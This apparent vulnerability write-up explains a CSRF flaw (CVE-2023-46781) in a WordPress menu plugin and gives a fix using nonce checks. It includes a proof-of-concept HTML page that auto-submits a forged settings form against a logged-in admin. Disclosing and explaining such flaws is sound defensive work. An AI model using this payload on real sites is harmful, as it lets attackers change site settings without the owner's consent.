CVE CyberSecurity Database News

CVE-2023-46781 - Cross-Site Request Forgery (CSRF) in Roland Murg Current Menu Item for Custom Post Types Plugin (<= 1.5) — Full Analysis & Exploit Details

Poster -

CVE-2023-46781 refers to a Cross-Site Request Forgery (CSRF) vulnerability discovered in the WordPress plugin "Current Menu Item for Custom Post Types" by Roland Murg, affecting all versions up to and including 1.5. This vulnerability can let attackers trick logged-in WordPress users, including admins, into performing unwanted actions, which can compromise site security.

In this post, we’ll explain the vulnerability in simple terms, show code snippets, walk you through an exploitation scenario, and provide references for deeper study.

What is Cross-Site Request Forgery (CSRF)?

CSRF is a web security bug that targets authenticated users. If a website isn’t careful about validating requests, attackers can trick users into performing actions they didn’t intend — just by visiting a malicious link or page. Imagine you’re logged into your site, then you open a shady link. If the site doesn’t check for CSRF, the attacker’s page could make you change settings without your knowledge.

About the Plugin

The Current Menu Item for Custom Post Types plugin (WordPress.org page: https://wordpress.org/plugins/current-menu-item-for-custom-post-types/) helps you add a CSS class to menu items when using custom post types. It supports site nav menus and is popular for developers working with custom content.

Where’s the Vulnerability?

By analyzing the plugin code (version 1.5 and below), we find that options can be changed via HTTP POST requests without checks for a CSRF token (nonce). Here’s an example of the handler:

// Simplified version based on plugin's code
if (isset($_POST['rmcmcpt_save_options'])) {
    update_option('rmcmcpt_option', $_POST['rmcmcpt_option']);
}

Problem? There’s no check_admin_referer() or *nonce* check to see if the request really comes from the WP admin interface. That means attackers can craft a form to submit unwanted changes when a logged-in admin visits a malicious page.

The attacker creates a website with the following HTML

<!DOCTYPE html>
<html>
<body>
  <h1>Click Here for a Surprise!</h1>
  <form action="https://your-wordpress-site.com/wp-admin/options-general.php?page=rmcmcpt_settings"; method="POST" id="csrfForm">
    <input type="hidden" name="rmcmcpt_option" value="malicious_value" />
    <input type="hidden" name="rmcmcpt_save_options" value="1" />
  </form>
  <script>
    // Auto-submit the form to launch the attack silently
    document.getElementById('csrfForm').submit();
  </script>
</body>
</html>

Note: The URL may be slightly different; adjust as needed based on your plugin's settings page.

3. Victim visits the attacker's page

If the victim is still logged into their WordPress dashboard in the same browser, and they visit the attacker's page, the form is automatically submitted in the background. It changes the plugin’s options as the attacker intended.

Site Appearance: The wrong setting may cause menus to highlight incorrectly.

- Abuse: Attackers could set the plugin to broken or malicious values, causing confusion or hiding important menus.

How to Fix It?

Plugin Developers:

Add nonce verification for any options change. Here’s how a secure handler might look

if (isset($_POST['rmcmcpt_save_options']) && check_admin_referer('rmcmcpt_options_save', 'rmcmcpt_nonce_field')) {
    update_option('rmcmcpt_option', $_POST['rmcmcpt_option']);
}

And, don’t forget to add the nonce field in your HTML form

<?php wp_nonce_field('rmcmcpt_options_save', 'rmcmcpt_nonce_field'); ?>

Site Owners:
Update the plugin as soon as a patch is available. If that isn’t possible, consider disabling it temporarily.

Look for unexpected POST requests to

/wp-admin/options-general.php?page=rmcmcpt_settings

References

- WordPress Plugin Page
- CVE-2023-46781 Details (wpvulndb)
- OWASP CSRF Explanation
- How to Use check_admin_referer()

Conclusion

CVE-2023-46781 is a classic WordPress plugin CSRF: easy to exploit, avoidable with simple code checks, and potentially risky for admins. If you use the *Current Menu Item for Custom Post Types* plugin, check your version, and update immediately when fixed. In WordPress plugin development, always use nonces for admin actions. Stay secure!

*For exclusive, in-depth vulnerability breakdowns, follow and share!*


_Disclaimer: This writeup is for educational purposes only. Don't exploit vulnerabilities on sites you don’t own._

Timeline

Published on: 11/06/2023 12:15:08 UTC
Last modified on: 11/14/2023 16:23:15 UTC